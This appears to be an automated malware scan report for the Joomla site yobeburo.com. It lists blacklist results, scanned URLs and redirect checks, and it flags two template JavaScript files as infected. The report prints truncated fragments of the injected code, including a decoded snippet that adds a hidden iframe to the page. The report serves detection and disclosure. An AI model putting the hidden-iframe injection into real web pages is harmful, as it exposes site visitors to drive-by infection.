Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yobeburo.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://yobeburo.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.yobeburo.com/ | 200 OK Content-Length: 13281 Content-Type: text/html | clean |
http://www.yobeburo.com/templates/ja_olyra/scripts/ja.script.js | 200 OK Content-Length: 17285 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var currentFontSize = 4; function revertStyles(fontsize){ currentFontSize = fontsize; changeFontSize(0); } function changeFontSize(sizeDifference){ var rule = getRuleByName("body.fs" + (currentFontSize + sizeDifference)); if (rule){ document.body.style.fontSize = rule.style.fontSize; currentFontSize = currentFontSize + sizeDifference; createCookie("FontSize", currentFontSize, 365); equalHeightInit(); } return; }; function if(f)e(s);} Decoded script: function equalHeightInit() { var topslleft = document.getElementById("ja-topsl-leftwrap"); var topslleftw2 = getElementsByClass("wrap2", topslleft, "DIV"); var topslleftw3 = getElementsByClass("wrap3", topslleft, "DIV"); if (!topslleft || !topslleftw2 || !topslleftw3) { return; } var lh = topslleftw3[0].offsetHeight + 39; var topslright = document.getElementById("ja-topsl-right"); var topslrightm = getElementsByClas ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://www.yobeburo.com/templates/ja_olyra/ja_iconmenu/ja.iconmenu.js | 200 OK Content-Length: 8278 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var title; var arr_img; function iconmenu_over(imgid){ curr_img=imgid; showtitle(imgid); } function iconmenu_out(imgid){ curr_img=0; hidetitle(imgid); } function showtitle(imgid) { var imageElem=arr_img[imgid]; title.innerHTML = imageElem.alt; left = Math.floor((icon_small-title.offsetWidth)/2) + icon_small * (curr_img-1) + icon_padding * 2 * (curr_img-1); title.style.left = left + "px"; } function hidetitle () { ti if(f)e(s);} Antivirus reports:
| ||
http://www.yobeburo.com/index.php?option=com_frontpage&Itemid=1 | 200 OK Content-Length: 13410 Content-Type: text/html | clean |
http://www.yobeburo.com/index.php?option=com_content&task=view&id=5&Itemid=6 | 200 OK Content-Length: 13491 Content-Type: text/html | clean |
http://www.yobeburo.com/index.php?option=com_content&task=view&id=12&Itemid=29 | 200 OK Content-Length: 13497 Content-Type: text/html | clean |
http://www.yobeburo.com/index.php?option=com_content&task=view&id=13&Itemid=30 | 200 OK Content-Length: 13497 Content-Type: text/html | clean |
http://www.yobeburo.com/index.php?option=com_contact&Itemid=3 | 200 OK Content-Length: 157 Content-Type: text/html | clean |
http://www.yobeburo.com/test404page.js | 404 Not Found Content-Length: 958 Content-Type: text/html | clean |
http://www.yobeburo.com/index.php | 200 OK Content-Length: 13308 Content-Type: text/html | clean |
http://www.yobeburo.com/index.php?option=com_content&task=section&id=1&Itemid=2 | 200 OK Content-Length: 13298 Content-Type: text/html | clean |
http://www.yobeburo.com/index.php?option=com_weblinks&Itemid=23 | 200 OK Content-Length: 14087 Content-Type: text/html | clean |
http://www.yobeburo.com/index.php?option=com_weblinks&catid=2&Itemid=23 | 200 OK Content-Length: 17104 Content-Type: text/html | clean |
http://www.yobeburo.com/index.php?option=com_weblinks&task=view&catid=2&id=1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 05 Oct 2014 04:36:23 GMT Location: http://www.joomla.org Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_bwlimited/1.4 Content-Length: 0 Content-Type: text/html Set-Cookie: c1e6d9ad49aab74db88c6d4fa73f1f7e=-; path=/ X-Powered-By: PHP/5.3.24 | clean |
http://www.joomla.org/ | 200 OK Content-Length: 30525 Content-Type: text/html | clean |
http://www.joomla.org/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yobeburo.com
Result:
GET / HTTP/1.1
Host: yobeburo.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: yobeburo.com
Referer: http://www.google.com/search?q=yobeburo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: yobeburo.com
Referer: http://www.google.com/search?q=yobeburo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.